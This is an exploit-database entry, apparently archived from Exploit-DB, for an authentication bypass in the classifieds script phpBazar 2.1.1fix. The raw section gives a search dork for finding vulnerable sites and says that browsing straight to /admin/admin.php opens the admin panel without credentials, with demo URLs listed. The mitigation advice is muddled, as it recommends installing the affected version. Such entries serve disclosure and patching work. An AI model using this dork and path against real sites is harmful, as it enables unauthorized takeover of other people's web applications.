header-logo
Suggest Exploit
vendor:
phpBazar
by:
Kurdish hackers team
8.8
CVSS
HIGH
Remote Administration-Panel Vulnerability
N/A
CWE
Product Name: phpBazar
Affected Version From: 2.1.2000
Affected Version To: 2.1.1fix
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Unknown

phpBazar-2.1.1fix Remote Administration-Panel Vulnerability

A vulnerability exists in phpBazar-2.1.1fix which allows an attacker to gain access to the admin control panel. The attacker can use a Dork to find vulnerable sites and then access the admin control panel by entering the URL http://server/path/admin/admin.php or http://server/admin/admin.php.

Mitigation:

Ensure that the latest version of phpBazar-2.1.1fix is installed and all security patches are applied.
Source

Exploit-DB raw data:

phpBazar-2.1.1fix Remote Administration-Panel Vulnerability


<<!>> Found by? :? kurdish hackers team

<<!>> C0ntact : pshela [at] YaHoo .com 
?????????????????? 
<<!>> Groups : Kurd-Team 

<<!>> site?? : www.kurdteam.org

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script: phpBazar-2.1.1fix

<<->> download script ::
 http://www.smartisoft.com/products.php?product=phpbazar

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Dork:phpBazar Ver. 2.1.0



<<->> Exploit ::

>>> http://server/path/admin/admin.php

Now we have admin control panel...

<<->> Demo :

http://server/ll/phpBazar-2.1.1fix/admin/admin.php

http://server/admin/admin.php

=======================================================

=======================================================

<<->> All freinds , Zryan_kurd , all member kurdish hackers team

Navigation

Suggest Exploit

Services By CQR